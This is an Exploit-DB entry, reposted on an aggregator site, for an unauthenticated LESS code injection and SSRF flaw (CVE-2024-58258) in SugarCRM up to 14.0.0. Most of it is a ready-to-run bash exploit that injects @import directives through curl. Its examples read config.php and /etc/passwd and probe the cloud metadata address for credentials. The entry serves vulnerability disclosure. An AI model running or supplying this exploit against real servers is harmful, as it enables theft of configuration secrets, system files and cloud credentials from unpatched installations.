[webapps] SugarCRM 14.0.0 - SSRF/Code Injection
SugarCRM 14.0.0及以下版本存在SSRF和代码注入漏洞,攻击者可通过GET参数注入恶意LESS代码,导致服务器读取任意文件或触发SSRF。 2025-7-16 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:14 收藏
SugarCRM 14.0.0及以下版本存在SSRF和代码注入漏洞,攻击者可通过GET参数注入恶意LESS代码,导致服务器读取任意文件或触发SSRF。 2025-7-16 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:14 收藏
# Exploit Title : SugarCRM 14.0.0 - SSRF/Code Injection
# Author: Egidio Romano aka EgiX
# Email : [email protected]
# Software Link: https://www.sugarcrm.com
# Affected Versions: All commercial versions before 13.0.4 and 14.0.1.
# CVE Reference: CVE-2024-58258
# Vulnerability Description:
User input passed through GET parameters to the /css/preview REST API
endpoint is not properly sanitized before parsing it as LESS code. This can
be exploited by remote, unauthenticated attackers to inject and execute
arbitrary LESS directives. By abusing the @import LESS statement, an
attacker can trigger Server-Side Request Forgery (SSRF) or read arbitrary
local files on the web server, potentially leading to the disclosure of
sensitive information.
# Proof of Concept:
#!/bin/bash
echo
echo "+----------------------------------------------------------------------+";
echo "| SugarCRM <= 14.0.0 (css/preview) LESS Code Injection Exploit by EgiX |";
echo "+----------------------------------------------------------------------+";
if [ "$#" -ne 2 ]; then
echo -ne "\nUsage.....: $0 <SugarCRM URL> <Local File or SSRF URL>\n"
echo -ne "\nExample...: $0 'http://localhost/sugarcrm/' 'config.php'"
echo -ne "\nExample...: $0 'http://localhost/sugarcrm/' '/etc/passwd'"
echo -ne "\nExample...: $0 'https://www.sugarcrm.com/' 'http://localhost:9200/_search'"
echo -ne "\nExample...: $0 'https://www.sugarcrm.com/' 'http://169.254.169.254/latest/meta-data/'\n\n"
exit 1
fi
urlencode() {
echo -n "$1" | xxd -p | tr -d '\n' | sed 's/../%&/g'
}
INJECTION=$(urlencode "1; @import (inline) '$2'; @import (inline) 'data:text/plain,________';//")
RESPONSE=$(curl -ks "${1}rest/v10/css/preview?baseUrl=1¶m=${INJECTION}")
if echo "$RESPONSE" | grep -q "________"; then
echo -e "\nOutput for '$2':\n"
echo "$RESPONSE" | sed '/________/q' | grep -v '________'
echo
else
echo -e "\nError: exploit failed!\n"
exit 2
fi
# Credits: Vulnerability discovered by Egidio Romano.
# Original Advisory: http://karmainsecurity.com/KIS-2025-04
# Other References: https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/
文章来源: https://www.exploit-db.com/exploits/52365
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh